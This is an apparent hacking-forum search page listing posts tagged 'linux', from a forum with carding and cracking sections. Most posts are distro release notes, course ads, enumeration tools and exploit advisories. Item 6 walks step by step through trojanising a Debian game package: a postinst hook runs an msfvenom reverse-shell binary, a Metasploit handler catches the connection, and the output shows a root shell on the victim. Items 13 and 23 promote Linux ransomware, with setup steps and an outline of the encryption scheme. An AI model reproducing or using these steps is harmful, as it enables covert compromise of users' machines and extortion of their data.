Search the Community

Showing results for tags 'linux'.

The search index is currently processing. Current results may not be complete.


More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Cracking Zone
  • Security & Anonymity
  • Operating Systems | Hardware | Programs
  • Graphic Design
  • vBCms Comments
  • live stream tv
  • Marketplace
  • Premium Accounts
  • Modders Section
  • PRIV8-Section
  • Cracking Zone PRIV8
  • Carding Zone PRIV8

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me


Location


Interests


Occupation


TeamViewer


Twitter


Facebook


Youtube


Google+


Tox

Found 64 results

  1. Using Old Windows Symbols with Ghidra in Linux Recently, while developing course material for a reverse engineering course I was making, I needed to get the symbols for the venerable sol.exe. Unfortunately the world’s greatest solitaire program is no longer shipped with windows, and subsequently Microsoft’s symbol servers have stopped providing debug information for it. The last complication was Ghidra’s support for PDB is limited to Windows only systems. This guide will walk through how I got the symbols for an unsupported OS (XP) working inside of the Ghidra Linux client. [Hidden Content]
  2. This Metasploit module exploits an issue in ptrace_link in kernel/ptrace.c before Linux kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but not over an SSH session, as it requires execution from within the context of a user with an active Polkit agent. In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME. View the full article
  3. dEEpEst

    USB Stealer Linux OS

    Well this USB stealer is not the same as in Windows OS, because on Linux you don't have permission to run scripts direct from USB. That's why you would need to copy script from USB to desktop for example, give permission to it and then just run the script! [Hidden Content]
  4. 0x1

    Postenum

    Postenum is a clean, nice and easy tool for basic/advanced privilege escalation vectors/techniques. Postenum tool is intended to be executed locally on a Linux box. Be more than a normal user. be the ROOT. USE : ./postenum.sh [option] ./postenum.sh -s ./postenum.sh -c Options : -a : All -s : Filesystem [SUID, SGID, Config/DB files, etc.] -l : Shell escape and development tools -c : The most interesting files -n : Network settings -p : Services and cron jobs -o : OS informations and kernel exploits -v : Software's versions -t : Fstab credentials and databases checker Version 0.8 Download: [Hidden Content]
  5. Complete Kali Linux Tutorial,Complete penetration testing training,Learn Hacking Created by Vishal Patel English What Will I Learn? Footprinting,Scanning,Enumeration,System Hacking,Trojan and Backdoors,Viruses and worms,Denial-of-service,Sniffing,Session Hijacking,Wireless Hacking,Firewall,IDS,Honeypots,Buffer Overflows,Penetration Testing,Cryptography Requirements Basic IT Skill Internet Users You will gain a comprehensive understanding of vulnerability assessment and the tools used in this process. What kind of security measures do you take to protect your facilities, equipment, resources, personnel, and property from damage caused by unauthorized access? In this course, Physical Security, these are questions that we will be answering. Footprinting is the gathering of information related to a particular computer and its users and systems. Reconnaissance is an exploration that is conducted to gain information. Network scanning is the scanning of public or private networks to find out which systems are running, their IP addresses, and which services they are running. In Port Scanning, you will learn how ports can be scanned, how a hacker can break into your network through the ports, and the countermeasures you can take to protect your device or network. Banner grabbing is a technique used to grab information about computer systems on a network and the services running its open ports. In this course you will be introduced to enumeration and the many different uses it has in computer systems. This course will include demos on the different tools and uses of enumeration. In this course you will be learning the fundamentals of Linux. We will be pairing this course with demos with a more in-depth look into some of the fundamentals and tools of Linux. Pentesting is an attack on a system in hopes of finding security weaknesses. In the course Configuring Linux for Pentesting, you will be learning the steps to configure Linux for pentesting and tools used for pentesting on a Linux system. Whenever we login to a computer system, we provide information to identify ourselves. We refer to this as authentication. Ensure that you know everything involved in securing a Windows system against attack. During this course you’ll get into Windows passwords — how they’re created, how they’re stored, and different methods used to crack them. You will take a good look at spyware, the activities it performs, different types of spyware, and the countermeasures needed in order to prevent hackers from utilizing these types of techniques against your company. You will also spend time studying different types of keyloggers. There are three different types of keyloggers that we see used in today’s environments: hardware, software, and kernel/driver keyloggers. Covering Tracks will be going over various ways that attackers have at their disposal to cover any tracks that may lead to their unwanted eviction, or worse yet, to an audit trail that would lead directly back to them. Trojans and Backdoors is the course where our software is going to be going undercover. You will discover what viruses and worms are and how they can infect computers and systems. Sniffers is our course where we take a look at Network Sniffing. Social engineering is the art of extorting employees for information. Become familiar with the following concepts: denial-of-service, distributed denial-of-service, and how the denial-of-service and distributed denial-of-service attacks take place. In the course Session Hijacking, you will learn details about session hijacking, well-known techniques employed by aggressors, the steps involved in session hijacking, various types of session hijacking, tools for hijacking sessions, ways you can protect yourselves from session hijacking, and how pentesting can be used to identify vulnerabilities. Hacking Web and Application Servers, is a course that will give you a good idea about vulnerabilities and attacks available for web servers and web applications. In our course our course Advanced Exploitation Techniques, you will learn what advanced exploitation techniques are and how you can use them in your penetration testing. Who is the target audience? Anyone want to learn how to hack IT Professionals Engineers IT Students Computer Known Network Engineers Internet Users Size: 2.34 GB [torrent file] [HIDE][Hidden Content]]
  6. dEEpEst

    Binary Linux Trojan

    In order to demonstrate that client side attacks and trojans are not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux. We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package freesweep, a text-based version of Mine Sweeper. [email protected]:~# apt-get --download-only install freesweep Reading package lists... Done Building dependency tree Reading state information... Done ...snip... [email protected]:~# mkdir /tmp/evil [email protected]:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil [email protected]:~# cd /tmp/evil/ [email protected]:/tmp/evil# Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added “features”. [email protected]:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work [email protected]:/tmp/evil# mkdir work/DEBIAN In the DEBIAN directory, create a file named control that contains the following: [email protected]:/tmp/evil/work/DEBIAN# cat control Package: freesweep Version: 0.90-1 Section: Games and Amusement Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers ([email protected]) Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use. We also need to create a post-installation script that will execute our binary. In our DEBIAN directory, we’ll create a file named postinst that contains the following: [email protected]:/tmp/evil/work/DEBIAN# cat postinst #!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep & Now we’ll create our malicious payload. We’ll be creating a reverse shell to connect back to us named ‘freesweep_scores’. [email protected]:~# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores Found 10 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 98 (iteration=0) x86/shikata_ga_nai chosen with final size 98 Payload size: 98 bytes Saved as: /tmp/evil/work/usr/games/freesweep_scores We’ll now make our post-installation script executable and build our new package. The built file will be named work.deb so we will want to change that to freesweep.deb and copy the package to our webroot directory. [email protected]:/tmp/evil/work/DEBIAN# chmod 755 postinst [email protected]:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'. [email protected]:/tmp/evil# mv work.deb freesweep.deb [email protected]:/tmp/evil# cp freesweep.deb /var/www/ If it is not already running, we’ll need to start the Apache web server. [email protected]:/tmp/evil# service apache2 start We will need to set up the Metasploit multi/handler to receive the incoming connection. [email protected]:~# msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/x86/shell/reverse_tcp; set LHOST 192.168.1.101; set LPORT 443; run; exit -y" PAYLOAD => linux/x86/shell/reverse_tcp LHOST => 192.168.1.101 LPORT => 443 [*] Started reverse handler on 192.168.1.101:443 [*] Starting the payload handler... On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game. [email protected]:~$ wget [Hidden Content] [email protected]:~$ sudo dpkg -i freesweep.deb As the victim installs and plays our game, we have received a shell! [*] Sending stage (36 bytes) [*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129) ifconfig eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6 inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:49 errors:0 dropped:0 overruns:0 frame:0 TX packets:51 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB) Interrupt:17 Base address:0x1400 ...snip... hostname ubuntu id uid=0(root) gid=0(root) groups=0(root) Source: [HIDE][Hidden Content]]
  7. Udemy Learn Kali Linux and Hack Android Mobile devices Penetration Testing Setup Your Lab Finding Your Way Around Kali Important Tools Exploitation Hacking Android devices Social Engineering Hacking using Android devices Remote attacks On Android [Hidden Content]
  8. itsMe

    Kali Linux 2019.3 Release

    We are pleased to announce that our third release of 2019, Kali Linux 2019.3, is available immediately for download. This release brings our kernel up to version 5.2.9, and includes various new features across the board with NetHunter, ARM and packages (plus the normal bugs fixes and updates). As promised in our roadmap blog post, there are both user facing and backend updates. CloudFlare Kali Linux is Open Source, and Cloudflare hearts Open Source – so it’s a perfect match! As a result, CloudFlare has graciously allowed us to use their content delivery network (CDN) to mirror our repository, allowing us to now distribute our content through them. A more technical breakdown can be found on their blog. We are currently running the CloudFlare services side by side with our standard and community mirrors. If you notice the kali.download domain appearing on screen when you run apt update, this means you’re using CloudFlare’s services. Tool Updates & New Packages As always, we have our updates for all our tools, including (but not limited to): Burp Suite HostAPd-WPE Hyperion Kismet Nmap There is a new tool (and it is included by default), amass, that has been well received in the bug bounty world. [HIDE][Hidden Content]]
  9. BlackArch Linux 2019.09.01 Releases: Linux kernel 5.2.9, added more than 150 new tools BlackArch Linux is an open source distribution of Linux derived from the lightweight and powerful Arch Linux operating system and designed from the ground up to be used by security professionals for penetration testing tasks. The repository contains more than 2050 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs. For more information, see the installation instructions. ChangeLog 2019.09.01: added more than 150 new tools added terminus font for all WMs (thanks to psf for i3-wm bugfixes) included linux kernel 5.2.9 new ~/.vim and ~/.vimrc (thanks to noptrix offering his config files) updated blackarch-installer to v1.1.19 various improvements and bugfixes removed dwm window manager replaced the default terminal xterm with rxvt-unicode updated look&feel: new BlackArch theme for WMs, grub, syslinux, etc. (special thanks to Erik!) QA’ed and fixed all packages (runtime exec). updated all blackarch tools and packages including config files updated all system packages updated all window manager menus (awesome, fluxbox, openbox) [HIDE][Hidden Content]]
  10. 0x1

    Linux Smart Enumeration

    Linux enumeration tool for pentesting and CTFs with verbosity levels Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view. What is it? This script will show relevant information about the security of the local Linux system. It has 3 levels of verbosity so you can control how much information you see. In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system. By default it will ask you some questions: mainly the current user password (if you know it so it can do some additional tests. How to use it? The idea is to get the information gradually. First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with. If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting. If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find useful to use ./lse.sh -l2 | less -r. You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro. Use: ./lse.sh [options] OPTIONS -c Disable color -i Non interactive mode -h This help -l LEVEL Output verbosity level 0: Show highly important results. (default) 1: Show interesting results. 2: Show all gathered information. -s SELECTION Comma separated list of sections or tests to run. Available sections: usr: User related tests. sud: Sudo related tests. fst: File system related tests. sys: System related tests. sec: Security measures related tests. ret: Recurren tasks (cron, timers) related tests. net: Network related tests. srv: Services related tests. pro: Processes related tests. sof: Software related tests. ctn: Container (docker, lxc) related tests. Specific tests can be used with their IDs (i.e.: usr020,sud) Source & Download : [Hidden Content]
  11. scripciónProgramaInstructorReseñas Precio actualGratis Precio original19,99 € Inscríbete ahora Garantía de reembolso de 30 días LINUXINTVIEW-QA-FREE Compartir Este curso incluye 3,5 horas de vídeo bajo demanda 2 recursos descargables Acceso de por vida Acceso en dispositivos móviles y TV Certificado de finalización Lo que aprenderás top linux interview questions and answers common linux questions and answers typical linux questions and answers introduction to linux linux for beginners introduction to linux bash shell terminal overview of some common linux shell commands linux linux administrator Ver más Requisitos Descripción This course is suitable for beginner to advanced levels/students. The course aims to prepare the student very well for some of the most common interview questions for Linux related jobs/careers. The course is highly recommended for Linux beginners, and should help the student to start using Linux very quickly. Via detailed answers, clear explanations and engaging practical examples using the Linux BASH shell terminal, the student should be able to do extremely well during interview questions, and successfully secure that job. Linux version used for this course is Ubuntu Linux 18.04, and a live dvd version is used via a virtual machine, so that the student can actually see the Linux desktop while listening to the lectures and following the practical examples. If you learn and understand all the answers to the 57 questions in this course, you should be able to comfortably ace most interviews for junior to intermediate level Linux jobs. Who is this course for? linux newbies beginner linux users linux administrators linux users interested in linux people interested in linux jobs anyone interested in Linux ubuntu debian linux users anyone new to linux people interested in learning Linux linux beginners people interested in learning some linux bash shell commands interested in a career in linux [Hidden Content]
  12. Linux suffers from use-after-free read vulnerabilities in show_numa_stats(). View the full article
  13. dEEpEst

    NodeCrypt - Linux Ransomware

    What is nodeCrypto? Install server Install and run Screenshot What is nodeCrypto? nodeCrypt is a linux Ransomware written in NodeJs that encrypt predefined files. This project was created for educational purposes, you are the sole responsible for the use of nodeCrypto. Install server Upload all file of server/ folder on your webserver. Create a sql database and import sql/nodeCrypto.sql Edit server/libs/db.php and add your SQL ID. Install and run git clone [Hidden Content] cd nodeCrypto && npm install You must edit first variable in index.js Once your configuration is complete, you can start the ransomware. node index.js The files at the root of the web server will encrypt and send to the server. Screenshot To Do Client (victim) Encrypt webserver Use private key for encryption Adapt SSL Server Recover data (user + encrypted file) Format the database Make GUI for webserver Make an executable to decrypt the files (Only on request! Contact me) [Hidden Content]
  14. Linux suffers from broken permission and object lifetime handling for PTRACE_TRACEME. View the full article
  15. Cat-Nip Automated Basic Pentest Tool this tool will make your basic pentesting task like Information Gathering, Auditing, And Reporting so this tool will do every task fully automatic. Pentest Tools Auto Executed With Cat-Nip Whois Lookup DNSmap Nmap Dmitry Theharvester Load Balancing Detector SSLyze Automater Ua Tester Gobuster Grabber Parsero Uniscan And More Tool Soon [HIDE][Hidden Content]]
  16. Reverie Automated Pentest Tools Designed For Parrot Linux this tool will make your basic pentesting task like Information Gathering, Security Auditing, And Reporting so this tool will do every task fully automatic. Pentest Tools Auto Executed With Reverie Whois Lookup DNSwalk Nmap Dmitry Whatweb wafw00f Load Balancing Detector SSLyze TLSSled Automater Nikto And More Tool Soon [HIDE][Hidden Content]]
  17. itsMe

    Kali Linux Tools Interface

    Kali Linux Tools Interface It is a graphical interface to use information security tools by the browser. The project uses the Kali Linux tools as a reference because it is the distribution that has the largest package of native tools. Prerequisites A Debian-based distribution (preferably Kali Linux) The information security tools installed Apache / Nginx service running SSH Service running Shell In A Box (if you want to use the Terminal) To install Shell In A Box, use the following command: sudo apt-get install shellinabox [HIDE][Hidden Content]]
  18. SELECTIVE COLLECTION OF LINUX E-BOOKS [Hidden Content]
  19. This Metasploit module exploits a vulnerability within the "ghelp", "help" and "man" URI handlers within Linux Mint's "ubuntu-system-adjustments" package. Invoking any one the URI handlers will call the python script "/usr/local/bin/yelp" with the contents of the supplied URI handler as its argument. The script will then search for the strings "gnome-help" or "ubuntu-help" and if doesn't find either of them it'll then execute os.system("/usr/bin/yelp %s" % args). User interaction is required to exploit this vulnerability. Versions 18.3 through 19.1 are affected. View the full article
  20. Pop! _OS, the recently released Linux distribution for the well-known Linux notebook maker System76, is based on the Ubuntu and GNOME desktop environments and aims to provide users with a personalized and fresh experience. Although based on the GNOME desktop environment, System76 customizes user interfaces, drivers, and more, with a modern, simple look and a better user experience. The creative and functional focus of Pop! _OS is aimed at professional users, making Linux desktops more productive and a great helper for engineers, developers, and computer scientists. The Pop!_OS developer recently released the Pop!_OS 19.04 ISO image. This version includes the following features: -The Slim Mode option maximizes your screen real estate by reducing the height of the header on application windows -Dark Mode gives your applications a relaxing ambience for nighttime viewing. Both Dark Mode and Slim Mode can be activated in the Appearance settings menu. -Refresh Install allows you to reinstall Pop!_OS without losing Users and any data in your Home directories. This feature is available from the recovery partition on new installations (not upgrades). For more information on how to do this, click here. -Pop!_OS has been updated to use version 5.0 of the Linux kernel -GNOME has been updated to version 3.32 -Packaging for both CUDA 10.1 and Tensorflow 1.13.1 toolkits -Gamehub and Lutris are now available through the Pop!_Shop -Popsicle, the installation media creator for Pop!_OS, has been improved to remove the possibility of UI freezes. -The NVIDIA driver has been updated from 410 to 418, which provides new hardware support, security and stability fixes, and improves GNOME Shell animations. More… [HIDE][Hidden Content]]
  21. ArcoLinux is an Arch Linux based distro that uses Arch Linux as a base elements from the AUR (applications from github, debian (deb), redhat (rpm), compressed files, etc…) ArcoLinux created elements (themes, icons, conky’s, tweaks and configs) Features Provide an operating system with all applications with personal theming installed but also bluetooth, printers, … After the installation no fuss and all fun. Provide a continuous stream of tutorials and knowledge on ArcoLinux. Easy setup. No technical knowledge. Low in cpu and memory consumption Provide all icons, themes, cursors, wallpapers, … out of the box. Provide Windows users a comfortable transition to the (Arch) Linux world. Blazing fast. Linux Arch Linux xfce openbox i3wm awesome budgie cinnamon gnome mate bspwm Changelog CALAMARES NEW VERSION 3.2.8 NEW PROJECT ARCOLINUXB XFCE BARE QTILE TUTORIALS AND PROJECTS QTILE OBLOGOUT QTILE MEMORY WIDGET QTILE NET GRAPH WIDGET QTILE NET WIDGET QTILE BATTERY QTILE SUPER + SHIFT + X BREAKING BAD CONKY MAINTENANCE OF GITHUBS NEW IN .BIN GENERAL IMPROVEMENTS FUTURE EFFORTS STAY ROLLING More… [HIDE][Hidden Content]]
  22. Learn the basics of the Linux operating systems. Get to know what it is all about, and familiarize yourself with the practical side. Basically, if you're a complete Linux newbie and looking for a quick and easy guide to get you started this is it. You've probably heard about Linux, the free, open-source operating system that's been pushing up against Microsoft. It's way cheaper, faster, safer, and has a far bigger active community than Windows, so why aren't you on it? Don't worry, Makeuseof.com understands. Like many things, venturing off into a completely unknown world can seem rather scary, and also be pretty difficult in the beginning. It's while adapting to the unknown, that one needs a guiding, and caring hand. This guide will tell you all you need to know in 20 illustrated pages, helping you to take your first steps. Let your curiosity take you hostage and start discovering Linux today, with this manual as your guide! Don't let Makeuseof.com keep you any longer, and download the Newbie's Initiation to Linux. With this free guide you will also receive daily updates on new cool websites and programs in your email for free courtesy of MakeUseOf. [HIDE][Hidden Content]]
  23. GonnaCry Ransomware GONNACRY – LINUX RANSOMWARE THAT ENCRYPTS ALL USER FILES GonnaCry Rasomware Original Repository of the GonnaCry Ransomware. This project is OpenSource, feel free to use, study and/or send pull request. GonnaCry is a linux ransomware that encrypt all user files with strong encryption scheme. There is two versions of the Ransomware Code: C and Python. How this ransomware works: [Hidden Content] [Hidden Content] How this ransomware encryption scheme works: [Hidden Content] Mentions: [Hidden Content] [Hidden Content] [Hidden Content] Disclaimer This Ransomware musn't be used to harm/threat/hurt other person's computer. It's purpose is only to share knowledge and awareness about Malware/Cryptography/Operating Systems/Programming. GonnaCry is a academic ransomware made for learning and awareness about secutiry/cryptography. Be aware running C/bin/GonnaCry or Python/GonnaCry/main.py Python/GonnaCry/bin/gonnacry in your computer, it may harm. What's a Ransomware? A ransomware is a form of malware that prevent legitimate users from accessing their device or data and asks for a payment in exchange for the stolen functionality. They have been used for mass extortion in various forms, but the most successful seem to be encrypting ransomware: most of the user data are encrypted and the key can be retrieved with a payment to the attacker. To be widely successful a ransomware must fulfill three properties: Property 1: The hostile binary code must not contain any secret (e.g. deciphering keys). At least not in an easily retrievable form, indeed white box cryptography can be applied to ransomware. Property 2: Only the author of the attack should be able to decrypt the infected device. Property 3: Decrypting one device can not provide any useful information for other infected devices, in particular the key must not be shared among them. Objectives: encrypt all user files with AES-256-CBC. Random AES key and IV for each file. Works even without internet connection. Communication with the server to decrypt Client-private-key. encrypt AES key with client-public-key RSA-2048. encrypt client-private-key with RSA-2048 server-public-key. Change computer wallpaper -> Gnome, LXDE, KDE, XFCE. Decryptor that communicate to server to send keys. python webserver Daemon Dropper Download: [HIDE][Hidden Content]]
  24. BackBox Linux is a penetration testing and security assessment oriented Linux distribution providing a network and systems analysis toolkit. It includes some of the most commonly known/used security and analysis tools, aiming for a wide spread of goals, ranging from web application analysis to network analysis, stress tests, sniffing, vulnerability assessment, computer forensic analysis, automotive and exploitation. It has been built on Ubuntu core system yet fully customized, designed to be one of the best Penetration testing and security distribution and more. As usual, this major release includes many updates. These include new kernel, updated tools and some structural changes with a focus on maintaining stability and compatibility with Ubuntu 18.04 LTS. What’s new Updated Linux Kernel 4.18 Updated desktop environment Updated hacking tools Updated ISO Hybrid with UEFI support System requirements 32-bit or 64-bit processor 1024 MB of system memory (RAM) 10 GB of disk space for installation Graphics card capable of 800×600 resolution DVD-ROM drive or USB port (3 GB) The ISO images for both 32bit & 64bit can be downloaded from the official web site download section: [HIDE][Hidden Content]]